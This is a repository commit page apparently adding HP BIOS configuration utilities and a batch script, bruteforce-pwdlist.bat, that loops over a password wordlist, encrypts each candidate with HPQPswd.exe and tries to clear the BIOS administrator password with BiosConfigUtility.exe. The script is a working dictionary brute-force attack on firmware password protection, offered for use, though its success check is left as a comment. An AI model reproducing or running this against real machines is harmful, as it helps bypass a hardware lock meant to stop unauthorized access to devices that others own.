Browse Source

initial uplaod

master
crt 1 month ago
commit
079d76983c
  1. BIN
      BIOS-Util/BCUsignature32.dll
  2. BIN
      BIOS-Util/BCUsignature64.dll
  3. BIN
      BIOS-Util/BiosConfigUtility.exe
  4. BIN
      BIOS-Util/BiosConfigUtility64.exe
  5. BIN
      BIOS-Util/HPQPswd.exe
  6. BIN
      BIOS-Util/HpqPswd64.exe
  7. 0
      bruteforce-charset.bat
  8. 29
      bruteforce-pwdlist.bat

BIN
BIOS-Util/BCUsignature32.dll

BIN
BIOS-Util/BCUsignature64.dll

BIN
BIOS-Util/BiosConfigUtility.exe

BIN
BIOS-Util/BiosConfigUtility64.exe

BIN
BIOS-Util/HPQPswd.exe

BIN
BIOS-Util/HpqPswd64.exe

0
bruteforce-charset.bat

29
bruteforce-pwdlist.bat

@ -0,0 +1,29 @@
@echo off
setlocal
REM Define where the BIOS-Util files are
set HPQPswdPath=C:\Path\To\HPQPswd.exe
set BiosConfigUtilityPath=C:\Path\To\BiosConfigUtility.exe
REM Define the path used to save the password file and where the password list is
set EncryptedPasswordFile=C:\Path\To\EncryptedPassword.bin
set PasswordListFile=C:\Path\To\passwordlist.txt
REM Iterate over each password in the list
for /F "tokens=*" %%p in (%PasswordListFile%) do (
echo Trying password: %%p
REM Create the encrypted password file for the current password
"%HPQPswdPath%" /p"%%p" /f"%EncryptedPasswordFile%"
REM Attempt to reset the BIOS password using the current password
"%BiosConfigUtilityPath%" /cpwdfile:"%EncryptedPasswordFile%" /nowdfile:""
REM Optionally check for success and break the loop if succeeded
REM This would depend on the output of BiosConfigUtility.exe indicating success
)
REM Cleanup
del "%EncryptedPasswordFile%"
endlocal
Loading…
Cancel
Save